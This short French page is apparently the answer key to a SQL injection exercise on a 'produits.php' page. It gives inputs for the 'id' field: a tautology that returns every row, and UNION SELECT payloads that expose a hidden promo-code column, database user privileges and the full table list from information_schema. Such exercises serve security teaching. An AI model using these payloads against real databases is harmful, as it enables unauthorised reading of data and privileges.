solutions injection produits.php

Non classé

Voici ce qu’il faut saisii dans le champ id pour…

  • a)  lire toutes les lignes inconditionnellement

1 or 1

  • b)  lire la colonne supplémentaire CODE_PROMO non affichée par défaut

1 union select 1,1,1, code_promo from produits

  • c) afficher la liste des user avec leurs droits (voir le shema ‘information_schema’ contenant les meta données MySQL…)

1 union select 1,table_schema, privilege_type,grantee from information_schema.schema_privileges

  • d) afficher la liste complete des tables de la base

1 union select 1,table_schema, table_name, table_rows from information_schema.tables